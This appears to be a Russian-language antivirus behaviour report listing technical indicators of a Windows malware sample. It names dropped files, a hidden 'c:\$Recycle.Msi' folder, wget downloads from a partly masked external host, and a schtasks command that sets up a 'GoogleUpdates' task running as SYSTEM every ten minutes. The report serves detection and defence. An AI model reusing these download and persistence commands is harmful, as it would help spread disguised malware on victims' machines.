Техническая информация
- %WINDIR%\Tasks\GoogleUpdates.job
- '%TEMP%\wget.exe' --load-cookies cookies.txt http://ms###st.name/2.php
- '%TEMP%\wget.exe' http://ms###st.name/17:24:44..ini
- '%TEMP%\wget.exe' http://ms###st.name/work.ini
- '%TEMP%\google.exe' -p1234567890__
- '%TEMP%\setups.exe' -p1234567890__
- '%TEMP%\wget.exe' --save-cookies cookies.txt http://ms###st.name/1.php
- '%TEMP%\GoogleUpdates.exe'
- '<SYSTEM32>\schtasks.exe' /Create /tn GoogleUpdates /TR "c:\$Recycle.Msi\GoogleUpdates.exe" /SC MINUTE /mo 10 /ru "SYSTEM"
- '<SYSTEM32>\schtasks.exe' /Delete /tn GoogleUpdates /f
- '<SYSTEM32>\ping.exe' -n 3 127.0.0.1
- '<SYSTEM32>\wscript.exe' "%TEMP%\Google.vbs"
- '<SYSTEM32>\attrib.exe' +S +H "c:\$Recycle.Msi"
- '<SYSTEM32>\ping.exe' -n 10 127.0.0.1
- '<SYSTEM32>\wscript.exe' "%TEMP%\setup.vbs"
- '<SYSTEM32>\attrib.exe' -S -H "c:\$Recycle.Msi"
- '<SYSTEM32>\find.exe' "Microsoft Windows XP"
- C:\$Recycle.Msi\cookies.txt
- C:\$Recycle.Msi\GoogleUpdates.exe
- %TEMP%\cookies.txt
- %TEMP%\Google.vbs
- %TEMP%\Google.cmd
- %TEMP%\google.exe
- %TEMP%\setup.cmd
- %TEMP%\GoogleUpdates.exe
- %TEMP%\setups.exe
- %TEMP%\1.php
- %TEMP%\wget.exe
- %TEMP%\setup.vbs
- %TEMP%\GoogleUpdates.exe
- 'ms###st.name':80
- ms###st.name/1.php
- DNS ASK ms###st.name
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'